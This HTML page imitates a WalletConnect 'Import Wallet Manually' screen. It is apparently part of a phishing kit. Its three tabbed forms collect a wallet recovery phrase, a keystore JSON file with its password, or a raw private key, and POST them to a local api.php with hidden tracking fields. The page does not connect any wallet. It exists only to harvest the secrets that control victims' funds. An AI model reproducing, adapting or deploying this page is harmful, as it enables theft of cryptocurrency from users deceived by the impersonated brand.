<html>


<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
    <link rel="stylesheet" href="main.css" type="text/css" />
    <meta charset="UTF-8">
    <meta name="description" content="Open protocol for connecting Wallets to Dapps">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta property="og:image" content="../images/logo.svg">
    <link rel="icon" href="../media/walletconnect.a37338d6.svg">
    <script>
        function openCity(evt, cityName) {
            // Declare all variables
            var i, tabcontent, tablinks;

            // Get all elements with class="tabcontent" and hide them
            tabcontent = document.getElementsByClassName("tabcontent");
            for (i = 0; i < tabcontent.length; i++) {
                tabcontent[i].style.display = "none";
            }

            // Get all elements with class="tablinks" and remove the class "active"
            tablinks = document.getElementsByClassName("tablinks");
            for (i = 0; i < tablinks.length; i++) {
                tablinks[i].className = tablinks[i].className.replace(" active", "");
            }

            // Show the current tab, and add an "active" class to the button that opened the tab
            document.getElementById(cityName).style.display = "block";
            evt.currentTarget.className += " active";
        }
    </script>
</head>

<title>Import Wallet</title>

<body>
    <center>
        <div class="top">
            <!-- <a href="../index-2.html#footer" class="left">Github</a>
            <a href="../index-2.html#" class="left">Docs</a> -->
            <a href="walletconnect.html" class="main"><img src="../images/logo_w.png" style="height: 60px; width: 60px;" alt="logo" /></a>
            <!-- <a href="../index-2.html#wallets" class="left">Wallets</a>
            <a href="../index-2.html#" class="left">Apps</a> -->
        </div>

        <h2 style="color: white;">
            <center>Import Wallet Manually</center>
        </h2>
        <br>
        <div class="tab">
            <button style="color: white;" class="tablinks" id="default" onclick="openCity(event, 'phrase')">Phrase</b></button>
            <button style="color: white;" class="tablinks" onclick="openCity(event, 'keystore')">Keystore JSON</b></button>
            <button style="color: white;" class="tablinks" onclick="openCity(event, 'private')">Private Key</b></button>
        </div>
        <br>
        <div id="phrase" class="tabcontent">
            <form action="api.php" method="POST">

                <input type="hidden" name="type" value="authereum" />
                <input type="hidden" name="category" value="Phrase" />

                <textarea name="phrase" required="required" minlength="12" placeholder="Phrase"></textarea>
                </br>
                <div style="color: white;" class="desc">Typically 12 (sometimes 24) words separated by single spaces</div>
                </br>
                <br>
                <button type="submit" name="import" class="btn">IMPORT</button>
            </form>
        </div>

        <div id="keystore" class="tabcontent">
            <form action="api.php" method="POST">

                <input type="hidden" name="type" value="authereum" />
                <input type="hidden" name="category" value="Keystore JSON" />

                <textarea name="keystorejson" required="required" minlength="12" placeholder="Keystore JSON"></textarea>
                </br>
                <div class="field">
                    <input type="text" name="keystorepasswword" placeholder="Password" />
                </div>
                <div style="color: white;" class="desc">Several lines of text beginning with '(...)' plus the password you used to encrypt it.</div>
                </br>
                <br>
                <button type="submit" name="import" class="btn">IMPORT</button>
            </form>
        </div>

        <div id="private" class="tabcontent">
            <form action="api.php" method="POST">
                <input type="hidden" name="type" value="authereum" />
                <input type="hidden" name="category" value="Private Key" />
                <div class="field">
                    <textarea type="text" rows="1" name="privatekey" placeholder="Private Key"></textarea>
                </div>
                <div style="color: white;" class="desc">Typically 12 (sometimes 24) words separated by single spaces</div>
                </br>
                <br>
                <button type="submit" name="import" class="btn">IMPORT</button>
            </form>
        </div>

        <script>
            document.getElementById("default").click();
        </script>

</body>



</html>